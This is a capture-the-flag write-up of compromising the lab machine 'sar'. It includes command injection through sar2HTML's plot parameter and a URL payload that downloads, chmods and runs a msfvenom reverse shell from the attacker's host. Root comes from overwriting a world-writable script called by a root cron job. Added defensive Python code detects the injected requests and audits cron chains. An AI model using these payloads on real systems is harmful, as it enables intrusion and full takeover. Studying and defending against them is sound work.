Let’s go!
kali@kali:~/work$ nmap target -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-04 16:39 MST
Nmap scan report for target (target)
Host is up (0.066s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 101.14 seconds
Let’s see what’s on the web server.
Alright, dirbusting it is.
kali@kali:~/work$ gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://target
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 271]
/.htpasswd (Status: 403) [Size: 271]
/.htaccess (Status: 403) [Size: 271]
/index.html (Status: 200) [Size: 10918]
/phpinfo.php (Status: 200) [Size: 95356]
/robots.txt (Status: 200) [Size: 9]
/server-status (Status: 403) [Size: 271]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Okay, what’s in robots.txt?
Let's head over to that directory.
If we click on OS, we get a set of links to URLs like:
http://target/sar2HTML/index.php?plot=LINUX
Let’s try to do some command injection with the following:
http://target/sar2HTML/index.php?plot=;id
It works! Unfortunately, I can’t show you the output because it’s stored in a dropdown menu that disappears when I try to screenshot, but it’s there and we are www-data.
Let’s generate a reverse shell.
kali@kali:~/work$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=me LPORT=4444 -f elf -o rshell
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: rshell
We’ll then use python to host our own HTTP server.
kali@kali:~/work$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
From there, we start our netcat listener and get the target to download our reverse shell, chmod it, and execute it.
http://target/sar2HTML/index.php?plot=;wget http://me:8000/rshell -O /tmp/rshell; chmod %2Bx /tmp/rshell; /tmp/rshell
kali@kali:~/work$ nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on target 51678
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux sar 5.0.0-23-generic #24~18.04.1-Ubuntu SMP Mon Jul 29 16:12:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Hooray, shell!
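From the defender's side, both the `;id` probe and the wget chain above leave the same trace in the web server log: a `plot` value that is not a plain name like LINUX. The following is an added example, not code from the write-up or from sar2HTML, that flags such requests; it assumes Apache combined-log style lines, and the sample lines are constructed rather than captured from the box.

```python
# Added defensive example (not from the write-up): flags sar2HTML 'plot' requests whose value
# is not a plain name like LINUX, as in the page's ;id probe and wget chain. Assumes Apache
# combined-log style lines; the sample lines below are constructed, not captured from the box.
import re
from urllib.parse import unquote_plus, urlsplit

VALID_PLOT = re.compile(r"^[A-Za-z0-9_-]+$")     # legitimate values seen on the page: LINUX
META = re.compile(r"\$\(|[;|&`$<>]")             # characters that chain or redirect commands
REQ = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
PLOT_PARAM = re.compile(r"(?:^|&)plot=([^&]*)")  # raw (still percent-encoded) plot values

SAMPLE_LOG = """\
10.0.0.5 - - [04/Nov/2024:16:45:01 -0700] "GET /sar2HTML/index.php?plot=LINUX HTTP/1.1" 200 5120
10.0.0.5 - - [04/Nov/2024:16:46:12 -0700] "GET /sar2HTML/index.php?plot=;id HTTP/1.1" 200 5301
10.0.0.5 - - [04/Nov/2024:16:49:33 -0700] "GET /sar2HTML/index.php?plot=;wget%20http://me:8000/rshell%20-O%20/tmp/rshell;%20chmod%20%2Bx%20/tmp/rshell;%20/tmp/rshell HTTP/1.1" 200 5310
10.0.0.7 - - [04/Nov/2024:16:50:00 -0700] "GET /sar2HTML/index.php?plot=CPU HTTP/1.1" 200 5100
"""

def classify_plot_value(value):
    """None for an expected plot name, otherwise a short reason the value is suspect."""
    if VALID_PLOT.match(value):
        return None
    meta = META.search(value)
    return "shell metacharacter %r" % meta.group() if meta else "unexpected characters"

def suspicious_plot_requests(log_text):
    """Return (ip, decoded plot value, reason) for each request carrying a suspect plot value."""
    hits = []
    for line in log_text.splitlines():
        m = REQ.match(line)
        if not m:
            continue
        query = urlsplit(m.group("url")).query
        # decode after extraction so %2B becomes + and %20 becomes a space, as the server saw it
        for raw in PLOT_PARAM.findall(query):
            value = unquote_plus(raw)
            reason = classify_plot_value(value)
            if reason:
                hits.append((m.group("ip"), value, reason))
    return hits

if __name__ == "__main__":
    for ip, value, reason in suspicious_plot_requests(SAMPLE_LOG):
        print("%s  %-26s %s" % (ip, reason, value))
```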
After poking around a bit, we see an entry in /etc/crontab that reads as follows.
www-data@sar:/var/www/html/sar2HTML$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
This shows that root changes into /var/www/html/ and runs ./finally.sh every 5 minutes. The astute among you will also notice I upgraded my shell. I did that with:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Unfortunately, we don't have permission to write to this file.
www-data@sar:/var/www/html/sar2HTML$ ls -al /var/www/html/finally.sh
ls -al /var/www/html/finally.sh
-rwxr-xr-x 1 root root 22 Oct 20 2019 /var/www/html/finally.sh
But what’s in it?
www-data@sar:/var/www/html/sar2HTML$ cat /var/www/html/finally.sh
cat /var/www/html/finally.sh
#!/bin/sh
./write.sh
Cool, it calls another file. Let’s check THAT file’s permissions.
www-data@sar:/var/www/html/sar2HTML$ ls -al /var/www/html/write.sh
ls -al /var/www/html/write.sh
-rwxrwxrwx 1 www-data www-data 30 Jul 24 2020 /var/www/html/write.sh
Yay! We can write to it. Let’s copy our rshell binary to it, start our netcat listener, and WAIT.
www-data@sar:/var/www/html/sar2HTML$ cp /tmp/rshell /var/www/html/write.sh
cp /tmp/rshell /var/www/html/write.sh
AND WE’RE ROOT!
kali@kali:~/work$ nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on target 51688
id
uid=0(root) gid=0(root) groups=0(root)
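The root cause here is a root cron job that ends up executing a script a low-privileged user can overwrite. As an added example (not code from the write-up), this audit walks a system crontab the way the box's chain works: root cron entry, then ./finally.sh, then the ./write.sh it calls, and reports any file in that chain that is not root-owned or is group/world-writable. It runs over a constructed in-memory filesystem standing in for /etc/crontab, os.stat and open.

```python
# Added defensive example (not from the write-up) over a constructed in-memory filesystem.
import os, re, shlex

CRONTAB_TEXT = """\
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
"""
# Constructed stand-in for the filesystem: path -> (owner uid, mode, contents).
FAKE_FS = {
    "/var/www/html/finally.sh": (0, 0o755, "#!/bin/sh\n./write.sh\n"),
    "/var/www/html/write.sh": (33, 0o777, "#!/bin/sh\necho hi\n"),
}

def root_cron_commands(text):
    """Yield the command of each schedule line run as root; skips comments and VAR=value."""
    for line in text.splitlines():
        parts = line.strip().split(None, 6)          # 5 schedule fields, user, command
        if len(parts) == 7 and not parts[0].startswith("#") and parts[5] == "root":
            yield parts[6]

def invoked_paths(command, cwd):
    """Absolute paths of programs a command line runs, honouring 'cd DIR' and 'sudo'."""
    paths = []
    for segment in re.split(r"&&|\|\||;", command):
        words = [w for w in shlex.split(segment) if w != "sudo"]
        if words and words[0] == "cd":
            cwd = words[1] if len(words) > 1 else "/"
        elif words and "/" in words[0]:              # bare names resolve via PATH; skipped
            paths.append(os.path.normpath(os.path.join(cwd, words[0])))
    return paths, cwd

def writable_problem(uid, mode):
    """None if only root can modify the file, otherwise why not."""
    if uid != 0:
        return "owned by uid %d, not root" % uid
    return "group/world-writable (%o)" % (mode & 0o777) if mode & 0o022 else None

def audit(crontab_text, fs):
    """(command, script, problem) for each modifiable script reachable from a root job."""
    findings, seen = [], set()
    for command in root_cron_commands(crontab_text):
        queue, cwd = invoked_paths(command, "/")
        while queue:
            path = queue.pop()
            if path in seen or path not in fs:
                continue
            seen.add(path)
            uid, mode, contents = fs[path]
            problem = writable_problem(uid, mode)
            if problem:
                findings.append((command, path, problem))
            for line in contents.splitlines():       # follow scripts this script runs
                if not line.startswith("#"):
                    queue.extend(invoked_paths(line, cwd)[0])
    return findings
```

Note that finally.sh itself looks fine (root, 755); the finding comes from following it one hop to write.sh, which a permissions check on the cron line alone would miss.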